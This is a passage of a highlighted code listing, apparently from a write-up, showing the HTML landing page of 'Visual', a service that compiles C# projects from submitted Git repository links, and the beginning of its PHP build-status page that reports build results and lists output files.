class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;navbar-toggler&#34;</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;button&#34;</span> <span class="na">data-bs-toggle</span><span class="o">=</span><span class="s">&#34;collapse&#34;</span> <span class="na">data-bs-target</span><span class="o">=</span><span class="s">&#34;#navbarSupportedContent&#34;</span> <span class="na">aria-controls</span><span class="o">=</span><span class="s">&#34;navbarSupportedContent&#34;</span> <span class="na">aria-expanded</span><span class="o">=</span><span class="s">&#34;false&#34;</span> <span class="na">aria-label</span><span class="o">=</span><span class="s">&#34;Toggle navigation&#34;</span><span class="p">&gt;&lt;</span><span class="nt">span</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;navbar-toggler-icon&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">span</span><span class="p">&gt;&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;collapse navbar-collapse&#34;</span> <span class="na">id</span><span class="o">=</span><span class="s">&#34;navbarSupportedContent&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">ul</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;navbar-nav ms-auto mb-2 mb-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">li</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;nav-item&#34;</span><span class="p">&gt;&lt;</span><span class="nt">a</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;nav-link active&#34;</span> <span class="na">aria-current</span><span class="o">=</span><span class="s">&#34;page&#34;</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;#!&#34;</span><span class="p">&gt;</span>Home<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;&lt;/</span><span class="nt">li</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">ul</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">nav</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Header--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">header</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;py-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;container px-lg-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;p-4 p-lg-5 bg-light rounded-3 text-center&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;m-4 m-lg-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h1</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;display-5 fw-bold&#34;</span><span class="p">&gt;</span>Welcome to Visual!<span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4&#34;</span><span class="p">&gt;</span>Experience a revolutionary approach to Visual Studio project compilation with Visual. Say goodbye to the frustrations of build issues on your machine. Simply provide us with your Git Repo link, and we&#39;ll handle the rest. Our cutting-edge technology compiles your projects and sends back the executable or DLL files you need, effortlessly and efficiently. <span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4&#34;</span><span class="p">&gt;</span>We currently support .NET 6.0 and C# programs, so make sure your Git Repo includes a .sln file for successful compilation. Trust Visual to simplify and streamline your project compilation process like never before.<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">header</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Page Content--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">section</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;pt-4&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;container px-lg-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Page Features--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;row gx-lg-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-collection&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4 fw-bold&#34;</span><span class="p">&gt;</span>Effortless Compilation<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-0&#34;</span><span class="p">&gt;</span>No need to stress over build issues. Let Visual do the heavy lifting for you!<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-cloud-download&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4 fw-bold&#34;</span><span class="p">&gt;</span>Direct Download<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-0&#34;</span><span class="p">&gt;</span>We compile your code and send back the executables directly to you!<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-code&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4 fw-bold&#34;</span><span class="p">&gt;</span>Support for .NET 6.0 <span class="err">&amp;</span> C#<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-0&#34;</span><span class="p">&gt;</span>We are always up to date, supporting the latest .NET 6.0 and C# programs.<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-bootstrap&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4 fw-bold&#34;</span><span class="p">&gt;</span>Seamless Submission<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-0&#34;</span><span class="p">&gt;</span>Use our straightforward form to submit your Git Repo links for compiling.<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-github&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;fs-4 fw-bold&#34;</span><span class="p">&gt;</span>GIT Integration<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-0&#34;</span><span class="p">&gt;</span>Visual integrates seamlessly with your Git repositories. Submitting your projects is just a click away!<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;col-lg-6 col-xxl-4 mb-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card bg-light border-0 h-100&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;card-body text-center p-4 p-lg-5 pt-0 pt-lg-0&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;feature bg-primary bg-gradient text-white rounded-3 mb-4 mt-n4&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;bi bi-github&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">form</span> <span class="na">action</span><span class="o">=</span><span class="s">&#34;/submit.php&#34;</span> <span class="na">method</span><span class="o">=</span><span class="s">&#34;POST&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">h2</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;h4 mb-4&#34;</span><span class="p">&gt;</span>Submit Your Repo<span class="p">&lt;/</span><span class="nt">h2</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;mb-3&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;url&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;gitRepoLink&#34;</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;form-control&#34;</span> <span class="na">placeholder</span><span class="o">=</span><span class="s">&#34;Enter Git Repo URL&#34;</span> <span class="na">required</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;submit&#34;</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;btn btn-primary&#34;</span><span class="p">&gt;</span>Submit<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">form</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">section</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Footer--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">footer</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;py-5 bg-dark&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;container px-lg-5&#34;</span><span class="p">&gt;&lt;</span><span class="nt">p</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;m-0 text-center text-white&#34;</span><span class="p">&gt;</span>Copyright <span class="ni">&amp;copy;</span> Visual 2023<span class="p">&lt;/</span><span class="nt">p</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">footer</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Bootstrap core JS--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">&#34;https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.3/js/bootstrap.bundle.min.js&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Core theme JS--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">&#34;js/scripts.js&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> vs_status.php </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp">&lt;!DOCTYPE html&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">head</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">&#34;UTF-8&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;viewport&#34;</span> <span class="na">content</span><span class="o">=</span><span class="s">&#34;width=device-width, initial-scale=1&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">title</span><span class="p">&gt;</span>Build Status<span class="p">&lt;/</span><span class="nt">title</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> [... snip ...] </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">head</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="cp">&lt;?php </span></span></span><span class="line"><span class="cl"><span class="cp">$logFilePath = __DIR__ . &#39;/build.output&#39;; // Path to the output file in the current directory </span></span></span><span class="line"><span class="cl"><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">if (file_exists($logFilePath)) { </span></span></span><span class="line"><span class="cl"><span class="cp"> $logContent = file_get_contents($logFilePath); // Get the content of the log file as a string </span></span></span><span class="line"><span class="cl"><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp"> if (preg_match(&#34;/succeeded\./i&#34;, $logContent)) { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Display directory listing </span></span></span><span class="line"><span class="cl"><span class="cp"> $dir = getcwd(); // Get the current working directory </span></span></span><span class="line"><span class="cl"><span class="cp"> $files = scandir($dir); // Get the list of files and directories in the directory </span></span></span><span class="line"><span class="cl"><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;h2&gt;Download your files:&lt;/h2&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p class=\&#34;success\&#34;&gt;[+] Build succeeded!&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;ul&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp"> foreach ($files as $file) { </span></span></span><span class="line"><span class="cl"><span class="cp"> if ($file != &#39;.&#39; &amp;&amp; $file != &#39;..&#39; &amp;&amp; $file != &#39;index.php&#39; &amp;&amp; $file != &#39;build.output&#39;) { </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;li&gt;&lt;a href=\&#34;$file\&#34; class=\&#34;file-link\&#34; download&gt;$file&lt;/a&gt;&lt;/li&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> } </span></span></span><span class="line"><span class="cl"><span class="cp"> } </span></span></span><span class="line"><span class="cl"><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;/ul&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> } elseif (preg_match(&#34;/FAILED\./i&#34;, $logContent)) { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Notify the user about build failure and present the failed content </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p class=\&#34;failure\&#34;&gt;[!] Your build failed. Here are the lines with errors:&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;div class=\&#34;toggle-code\&#34; onclick=\&#34;toggleCodeBlock()\&#34;&gt;Toggle Code&lt;/div&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;div class=\&#34;code-block\&#34; id=\&#34;codeBlock\&#34;&gt; </span></span></span><span class="line"><span class="cl"><span class="cp"> &lt;pre&gt;&#34; . htmlspecialchars($logContent) . &#34;&lt;/pre&gt; </span></span></span><span class="line"><span class="cl"><span class="cp"> &lt;/div&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> } elseif (stripos($logContent, &#39;Invalid Repo&#39;) !== false) { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Repository doesn&#39;t contain a .sln file or the URL submitted is invalid </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p class=\&#34;failure\&#34;&gt;[-] The repository doesn&#39;t contain a .sln file or the URL submitted is invalid.&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> } elseif (stripos($logContent, &#39;Timed Out&#39;) !== false) { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Build has timed out </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p class=\&#34;timeout\&#34;&gt;[x] Your build has timed out. Please submit again.&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> } else { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Build is still in progress </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p&gt;[-] Your build is still being compiled. Please be patient.&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> $refreshInterval = 5; // Refresh every 5 seconds </span></span></span><span class="line"><span class="cl"><span class="cp"> header(&#34;refresh: $refreshInterval&#34;); </span></span></span><span class="line"><span class="cl"><span class="cp"> } </span></span></span><span class="line"><span class="cl"><span class="cp">} else { </span></span></span><span class="line"><span class="cl"><span class="cp"> // Output file doesn&#39;t exist </span></span></span><span class="line"><span class="cl"><span class="cp"> echo &#34;&lt;p&gt;[-] Your build is still being compiled. Please be patient.&lt;/p&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="cp"> $refreshInterval = 5; // Refresh every 5 